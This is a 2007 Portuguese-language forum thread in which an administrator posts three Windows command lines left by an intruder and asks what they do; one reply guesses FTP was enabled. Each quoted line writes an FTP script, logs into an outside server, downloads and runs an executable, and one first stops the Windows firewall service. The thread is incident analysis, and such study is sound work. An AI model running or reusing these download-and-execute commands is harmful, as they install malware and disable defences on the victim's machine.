Perguntas & Respostas

Publicada por ddoisbolla em 26/06/2007 - 11:23h:
* ddoisbolla usa Nenhuma

saudações colaboradores do vol,
consegui detectar uma invasão em uma máquina da rede que ajudo a monitorar e peguei algumas linhas que o safado deixou no serviço de diretorios do outlook. gostaria de saber o que ele queria com esse script, alguem pode me ajudar!? por onde ele poder ter entrado?

mroot%system32cmd.execmd /c echo open 200.171.87.100 38705 >> ik &echo user niloz fucky0 >> ik &echo get 0.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &0.exe &exit

mroot%system32cmd.execmd /c net stop SharedAccess &echo open DivineFTP.snusk.nu 21 >> ij &echo user Gekko DSN654apoc >> ij &echo binary >> ij &echo get Gekko.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &Gekko.exe &net start SharedAccess &exit

mroot%system32cmd.execmd /c echo open 200.171.101.47 27607 >> ik &echo user niloz fucky0 >> ik &echo get 9.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &9.exe &exit

Resposta de adrianoturbo em 26/06/2007 - 11:32h:
* adrianoturbo usa Debian
* adrianoturbo tem conceito: 8.7

Parece que tinha ativado Ftp na máquina .

Voltar

ATENÇÃO: Antes de contribuir com uma resposta, leia o artigo Qualidade de respostas e certifique-se de que esteja realmente contribuindo com a comunidade. Muitas vezes o ímpeto de contribuir nos leva a atrapalhar ao invés de ajudar.